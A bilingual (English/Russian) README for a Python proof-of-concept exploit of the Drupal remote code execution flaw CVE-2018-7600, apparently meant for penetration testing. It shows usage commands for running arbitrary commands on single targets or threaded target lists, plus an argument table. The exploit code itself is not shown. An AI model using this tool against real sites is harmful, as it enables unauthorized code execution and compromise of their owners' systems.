
This repository showcases a fully self-developed Proof-of-Concept (PoC) for CVE-2018-7600, widely known as Drupalgeddon 2. This critical vulnerability in Drupal 7 and 8 core enables remote code execution (RCE), and the PoC demonstrates its exploitation in a clear and educational manner.
Этот репозиторий содержит доказательство концепции эксплойта на Python для критической уязвимости удаленного выполнения кода в Drupal, известной как Drupalgeddon2 (CVE-2018-7600). Данный скрипт предназначен для образовательных целей и для использования специалистами по безопасности в рамках авторизованного тестирования на проникновение.
Этот инструмент предназначен только для законных и этических целей. Использование данного скрипта в любой системе без явного разрешения владельца является незаконным. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом. Используйте на свой страх и риск.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
Скрипт поддерживает несколько аргументов командной строки для настройки его выполнения.
Эксплойт одной цели с командой по умолчанию (whoami):
python3 drupalgeddon2.py -t http://example.com
Эксплойт одной цели с произвольной командой (например, ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Сканирование списка целей из файла:
Создайте файл targets.txt с одним URL на строку:
http://site1.com
https://site2.org
http://site3.net
Затем запустите скрипт:
python3 drupalgeddon2.py -l targets.txt
Сканирование списка с произвольной командой и увеличенным числом потоков:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Сохранение вывода в файл журнала:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Аргумент | Короткий | Описание | По умолчанию |
|---|
--target | -t | Одиночный URL цели. | - |
--list | -l | Путь к файлу со списком URL целей. | - |
--command | -c | Команда для выполнения на цели. | whoami |
--threads | -T | Количество одновременных потоков. | 5 |
--output | -o | Файл для записи журнала вывода. | - |
--timeout | Тайм-аут запроса в секундах. | 15 |